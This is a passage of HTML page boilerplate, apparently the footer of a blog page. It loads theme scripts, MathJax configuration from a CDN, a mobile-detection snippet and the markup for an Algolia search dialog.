src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script src="/js/search/algolia.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
  tex2jax: {
    inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
    processEscapes: true,
    skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
  },
  CommonHTML: {
    linebreaks: { automatic: true, width: "90% container" }
  },
  "HTML-CSS": { 
    linebreaks: { automatic: true, width: "90% container" }
  },
  "SVG": { 
    linebreaks: { automatic: true, width: "90% container" }
  }
});
</script><script type="text/x-mathjax-config">MathJax.Hub.Queue(function() {
  var all = MathJax.Hub.getAllJax(), i;
  for (i=0; i < all.length; i += 1) {
    all[i].SourceElement().parentNode.className += ' has-jax';
  }
});
</script><script src="https://cdn.jsdelivr.net/npm/mathjax/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="algolia-search"><div class="search-dialog__title" id="algolia-search-title">Algolia</div><div id="algolia-input-panel"><div id="algolia-search-input"></div></div><hr><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-stats"></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>